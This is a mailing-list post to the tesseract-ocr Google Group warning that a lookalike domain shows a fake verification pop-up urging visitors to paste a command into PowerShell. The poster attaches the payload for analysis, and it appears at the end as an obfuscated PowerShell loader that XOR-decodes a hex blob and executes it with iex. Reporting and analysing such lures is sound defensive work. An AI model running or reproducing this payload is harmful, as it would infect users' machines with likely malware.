I'm asking this because upon visiting "tesseract-ocr<dot>com", I am greeted
with a suspicious "verification pop-up" asking to open up windows
powershell and press "ctrl-v", which obviously means it's asking me to run
what is probably malware on my machine. I've attached the ctrl-v payload as
a .txt file if anyone wants to analyse it.
If it isn't run by the actual Tesseract-OCR devs, I'm gonna recommend
emailing [email protected] since that's the domain registrar (based on
looking up the WHOIS).
--
You received this message because you are subscribed to the Google Groups
"tesseract-ocr" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to [email protected].
To view this discussion visit
https://groups.google.com/d/msgid/tesseract-ocr/3326d46b-2c0f-4f24-8029-9b8cc8021209n%40googlegroups.com.
<# Code: 1e6d5f942a0ebc71 #>
$k='btdmAy';$h='46021e1c7103044943361200110001006f3707004a3e240b141d070811160b1a102020170313011f1c435827010e340b0b001d3d3316161b07022d4439271d1e351c0f5a2a083557311107183310160d341f2e0d0d170b011500121139577b2d0e07555f7a5d1a49434a3b101253435665095f53434a6642460059272e100c59340c35114250010337433631293d615139271d1e351c0f5a2d226f2903000c307b432511103f2017061b092b2815073a050024514b5d5f23240e4f3d10082c594f3d10082c2d1b04014d0510101107192e0b1b54493d200d0a5440196154241b160e24052d0110400f0c0e185f493b44281b0d036c2903000c4d650d425c3f3e380a1611094308364c2405192924584e2308352b031a00022c3f0b1801232014075c4d46665e4c111c08665e4b4f400b7c330d1d0a401118161c444935594a2f3714320d07194a240e57321510051c435833011913180c100b0007100e112a0c2c1c4a5d4f4a665745534f49395059500b067c4959120b1f695d0b495456651042590819614a4259050325594f1a0b19615d0d1f5f492852495d1f193300191d02456c170d004445151c1100493d200d0a5440176850193d0a1b2e1207593308232b07051108320d4259311f285945530c193509114e4b42271c10180d066f0a0a1b144220090b5b53176f1c1a11434a61542d01102b28150754401761543707012f200a0b17340c330a0b1a03100817141b0f086c2e07163608300c0707104d6c2c101d444a66111600141e7b564d12011f2d10095a17052e094d1514046e100c1001156f090a045b0c7c1d0e5210022a1c0c49015879185342570874485612015e731d01465755791a56450109244d5b150058744807105c5b774c56115258754803165c0f79495643075a781b06100209771a4407160e7c1a0e1d070627101a52070f7c1f0b06010b2e014406010b7c111600141e644a2351562b644b2410110e2a1d17170f0a2e57011b0948733f44190b09244401180d0e2a1f0b0c420e22443133434a61542d01102b28150754400b61543707012f200a0b17340c330a0b1a0356281f4a20011e355432151005615d045d1f492e125f4519082d0a070f3719200b16593701241c1254493e241a0d1a001e614b1f09070c351a0a0f3719200b16593701241c1254493e241a0d1a001e614b1f095f0427514f1a0b196151361117196c2903000c4d651f4b5d1f08391016095f492444281b0d036c2903000c4d650d425c3f3e380a1611094308364c2405192924584e2308352b031a00022c3f0b1801232014075c4d447a3707034924351c0f544924351c0f201d1d2459261d1608220d0d061d4d6c2903000c4d651c42592202331a07082b1835542c0108017a5d03492445665e1a534341665e4f0d434a68420b124c4931594f1a014d665e45534d16651849494c4a66541253434665094b09400c6a444a5343402e5e455f4008684246154f50651f591d0245151c1100493d200d0a544017680244544017613903082b1835542c0108013c1c0e070116120d03061040110b0d17011e32594f320d01242903000c4d651f425933042f1d0d033719381507542c04251d071a1956651c1a11592a240d4f370c042d1d2b000100615432151005615d0754492b28151611164d6b57070c014d6c2b0717111f321c425922042d1c1e270101241a16592b0f2b1c0100444007101007104d70420b124c492401075d1f3e35181000493d33160111171e6154241d08081118161c44492401075a22182d152c1509086154351b1606281705300d1f241a161b1614615d070c01430510101107192e0b1b5a22182d152c1509086154351d0a092e0e31001d0124592a1d000924171f11081e24023100051f355432060b0e240a1154492b28150724051929594612444016100c100b1a120d1b18014d0910061001033c4216061d16131c0f1b12086c301611094d6c350b00011f201532151005615d0454492b2e0b01114440040b101b162c220d0b1b0a4d12100e110a192d00211b0a1928171711190e200d011c1f107a0d100d1f042751361117196c2903000c4d65034b0f36082c1614114924351c0f544921280d070605011118161c44493b594f320b1f221c4259211f33161035071928160c5437042d1c0c00081402160c000d03341c1f09070c351a0a0f195666423100051f355432060b0e240a1154493a2817061b133e35000e114425281d06110a4d31161511161e291c0e184440000b050109082f0d2e1d1719615e4f3a0b3d3316041d08086655455933042f1d0d03371938150753484a0910061001036655455927022c14031a004a6d5d140e155d3b1f59111c0435';$o='';for($i=0;$i
-lt $h.Length;$i+=2){$o+=[char]([convert]::ToInt32($h.Substring($i,2),16)-bxor
[int][char]$k[$i/2%$k.Length])};iex $o
